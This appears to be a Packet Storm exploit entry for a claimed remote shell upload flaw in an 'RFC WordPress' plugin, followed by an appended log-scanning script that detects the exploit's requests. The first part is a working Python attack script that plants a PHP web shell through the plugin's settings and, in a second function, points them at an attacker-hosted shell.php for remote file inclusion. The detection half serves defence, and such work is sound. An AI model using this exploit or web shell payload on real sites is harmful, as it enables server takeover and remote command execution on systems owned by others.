
WordPress RFC WordPress 6.0.8 Shell Upload

WordPress RFC WordPress plugin version 6.0.8 suffers from a remote shell upload vulnerability.

Packet Storm
#vulnerability#wordpress#php#rce
Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8

    import requests
    import sys

    target = "https://target.com"

    # Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8
    # CODE BY E1.Coders  "The King of Security"
    def exploit_rfc_wordpress():
        url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php"
        payload = "<?php system($_GET['cmd']); ?>"

        try:
            response = requests.post(url, data={"rfc_action": "save_settings", "rfc_settings": payload})
            if response.status_code == 200:
                print("RCE exploit successful!")
                print(f"Visit {url}?cmd=whoami to execute commands")
            else:
                print("RCE exploit failed.")
        except requests.exceptions.RequestException as e:
            print(f"Error: {e}")

    # Exploit for Remote File Inclusion (RFI) in RFC WordPress
    def exploit_rfi_rfc_wordpress():
        url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php?rfc_action=save_settings"
        payload = "http://attacker.com/shell.php"

        try:
            response = requests.post(url, data={"rfc_settings": payload})
            if response.status_code == 200:
                print("RFI exploit successful!")
                print(f"Visit {target}/wp-content/plugins/rfc-wordpress/shell.php to execute commands")
            else:
                print("RFI exploit failed.")
        except requests.exceptions.RequestException as e:
            print(f"Error: {e}")

    if __name__ == "__main__":
        exploit_rfc_wordpress()
        exploit_rfi_rfc_wordpress()
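A detection-side companion to the requests the script above sends, added here as an example and not part of the Packet Storm entry: it scans access log lines for a client that POSTs to the plugin's rfc.php and then requests rfc.php with a cmd parameter or shell.php under the plugin directory. It assumes combined log format; the log lines are constructed and the names find_suspects, PLUGIN_DIR and SAMPLE_LOG are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Plugin path as it appears in the script on this page.
PLUGIN_DIR = "/wp-content/plugins/rfc-wordpress/"
# Combined log format: client, identity, user, [time], "METHOD target proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Nov/2024:10:00:01 +0000] "POST /wp-content/plugins/rfc-wordpress/rfc.php HTTP/1.1" 200 12 "-" "python-requests/2.31"
198.51.100.7 - - [01/Nov/2024:10:00:05 +0000] "GET /wp-content/plugins/rfc-wordpress/rfc.php?cmd=whoami HTTP/1.1" 200 9 "-" "curl/8.0"
203.0.113.9 - - [01/Nov/2024:10:01:00 +0000] "GET /wp-content/plugins/rfc-wordpress/rfc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.20 - - [01/Nov/2024:10:02:00 +0000] "POST /wp-content/plugins/rfc-wordpress/rfc.php?rfc_action=save_settings HTTP/1.1" 200 12 "-" "python-requests/2.31"
203.0.113.20 - - [01/Nov/2024:10:02:09 +0000] "GET /wp-content/plugins/rfc-wordpress/shell.php HTTP/1.1" 404 0 "-" "curl/8.0"
"""

def find_suspects(log_text):
    """Return {client_ip: [follow-up requests]} for clients that POSTed to rfc.php first."""
    posted = set()   # clients seen POSTing to the plugin's rfc.php
    followups = {}   # client -> follow-up requests matching the script's pattern
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, method, status = m["ip"], m["method"], m["status"]
        url = urlsplit(m["target"])
        if not url.path.startswith(PLUGIN_DIR):
            continue
        name = url.path[len(PLUGIN_DIR):]
        if method == "POST" and name == "rfc.php":
            posted.add(ip)
        elif method == "GET" and ip in posted:
            if name == "rfc.php" and "cmd" in parse_qs(url.query, keep_blank_values=True):
                followups.setdefault(ip, []).append(f"rfc.php?cmd= (HTTP {status})")
            elif name == "shell.php":
                followups.setdefault(ip, []).append(f"shell.php (HTTP {status})")
    return followups

if __name__ == "__main__":
    for ip, hits in find_suspects(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(hits))
```

The status code in each finding separates a follow-up that was served (200) from one that was not (404), which helps decide which hosts need a file-system check of the plugin directory first.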
